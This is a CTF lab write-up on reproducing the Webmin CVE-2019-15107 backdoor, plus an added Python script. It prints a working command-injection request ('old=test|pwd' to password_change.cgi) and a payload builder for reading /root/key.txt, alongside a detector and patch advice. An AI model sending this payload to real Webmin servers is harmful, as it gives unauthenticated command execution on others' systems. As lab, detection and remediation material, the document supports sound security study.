墨者学院 (Mozhe Academy) - Webmin unauthenticated remote code execution
2022-07-04 07:40:00 【Lyswbb】
First, open the target range in a browser; it lands on a login page.

The challenge title says unauthenticated RCE, so the first step is to look up the known CVE for Webmin (CVE-2019-15107) and reproduce it directly. The vulnerable code is the expired-password change handler, password_change.cgi; the related setting (prompting users with expired passwords to enter a new one) is under Webmin > Webmin Configuration > Authentication. In the backdoored 1.890 release that handler is reachable without the option being enabled; in 1.900 to 1.920 it is only reachable when the option is on, and 1.930 removed the backdoor.

Capture the login request with Burp and modify it: change session_login.cgi in the request line to password_change.cgi, and copy the body parameters below as they are. The vulnerable path is only taken when the expired parameter is present, but the command itself goes in the old parameter: whatever follows the | is run by the shell, and its output comes back in the response page.
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
Then use the same technique to read key.txt under the root directory and submit it.
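The following script is an added example, not code from the original write-up or from the Webmin project. It reproduces the request body above from a given command (so the expired/old mechanics are explicit) and, for the defensive side, flags such requests in captured HTTP traffic. The host, user name and the sample requests are constructed for the example; nothing is sent over the network.

```python
"""Added example (not from the original post): build the CVE-2019-15107
request body shown above and flag such requests in captured HTTP traffic.
The host, user name and sample requests below are constructed assumptions."""
import re
from urllib.parse import parse_qs, urlencode

# Shell metacharacters that have no business in a password field
SHELL_META = re.compile(r"[|;&`$]")


def build_body(command: str, user: str = "dfgfgf") -> str:
    """Form body for POST /password_change.cgi.

    The backdoored handler only reaches the vulnerable path when "expired" is
    present; the value of "old" is then handed to Perl's qx//, so "test|<cmd>"
    makes the shell run <cmd> and its output lands in the error page.
    "|" is left unencoded to match the Burp request in the write-up (the
    server would decode %7C just the same).
    """
    params = {
        "user": user,
        "pam": "",
        "expired": "2",
        "old": f"test|{command}",
        "new1": "test2",
        "new2": "test2",
    }
    return urlencode(params, safe="|")


def is_cve_2019_15107_attempt(raw_request: str) -> bool:
    """Return True if a raw HTTP request looks like an exploitation attempt.

    Criteria: POST to /password_change.cgi, an "expired" field in the body,
    and shell metacharacters in "old" (where a real old password would be).
    """
    text = raw_request.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.splitlines()
    if not lines:
        return False
    parts = lines[0].split(" ")
    if len(parts) < 2:
        return False
    method, path = parts[0], parts[1].split("?", 1)[0]
    if method != "POST" or path != "/password_change.cgi":
        return False
    form = parse_qs(body.strip(), keep_blank_values=True)
    if "expired" not in form:
        return False
    return any(SHELL_META.search(value) for value in form.get("old", []))


# Constructed samples: the write-up's request (headers trimmed, blank line
# before the body) and a legitimate-looking password change for comparison.
EXPLOIT_REQUEST = (
    "POST /password_change.cgi HTTP/1.1\r\n"
    "Host: 124.70.64.48:47372\r\n"
    "Cookie: redirect=1; testing=1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 61\r\n"
    "\r\n"
    + build_body("pwd")
)

BENIGN_REQUEST = (
    "POST /password_change.cgi HTTP/1.1\r\n"
    "Host: 124.70.64.48:47372\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=admin&pam=&old=Hunter2!&new1=NewPass9&new2=NewPass9"
)

if __name__ == "__main__":
    print(build_body("cat /root/key.txt"))
    print("exploit flagged:", is_cve_2019_15107_attempt(EXPLOIT_REQUEST))
    print("benign flagged:", is_cve_2019_15107_attempt(BENIGN_REQUEST))
```

The detector keys on the combination the backdoor needs (the expired field plus shell syntax in old) rather than on the exact payload, so it also catches percent-encoded variants. The real fix is to upgrade Webmin to 1.930 or later; on 1.900 to 1.920 keeping the expired-password prompt disabled closes the path as well.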
